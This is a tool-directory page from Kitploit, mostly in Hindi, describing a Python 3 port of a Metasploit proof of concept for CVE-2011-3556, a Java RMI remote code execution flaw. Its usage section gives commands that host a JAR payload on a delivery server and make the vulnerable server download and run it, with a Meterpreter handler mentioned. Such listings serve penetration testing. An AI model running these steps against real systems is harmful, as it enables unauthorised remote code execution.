Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve_2011_3556 — Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC). | Kitploit
उपकरण/GitHubGitHub/sk4la/cve_2011_3556
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsk4la/cve_2011_3556

cve_2011_3556

Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).

रिपॉजिटरी देखें
17 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2011-3556 — अवधारणा का प्रमाण (PoC)

अस्वीकरण

यह उपकरण mihi द्वारा Metasploit Framework के लिए बनाए गए मौजूदा अवधारणा का प्रमाण (PoC) का Python 3 कार्यान्वयन है।

आवश्यक शर्तें

मॉड्यूल का उपयोग करने के लिए, नीचे दिए गए निर्देशों का पालन करें:

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

उपयोग

कमांड-लाइन

कमजोर Java RMI सर्वर द्वारा दूरस्थ रूप से लोड करने के लिए, पेलोड (एक JAR बाइनरी) को HTTP संसाधन के रूप में प्रस्तुत किया जाना चाहिए। कोई इसे प्रसिद्ध python3 -m http.server का उपयोग करके शीघ्रता से प्रस्तुत कर सकता है।

एक बार पेलोड डाउनलोड के लिए उपलब्ध हो जाने पर, भेद्यता को ट्रिगर करने के लिए बस exploit.py स्क्रिप्ट निष्पादित करें।

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

यदि पेलोड Meterpreter (Metasploit Framework) है, तो use exploit/multi/handler का उपयोग करना न भूलें।

लाइब्रेरी

इस मॉड्यूल का उपयोग लाइब्रेरी के रूप में भी किया जा सकता है, अपने वर्तमान नाम स्थान में cve_2011_3556 मॉड्यूल आयात करके:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

यह उतना ही सरल है!

श्रेय

Metasploit Framework मॉड्यूल के प्रारंभिक कार्यान्वयन के लिए mihi का विशेष धन्यवाद।

टूल डाउनलोड करें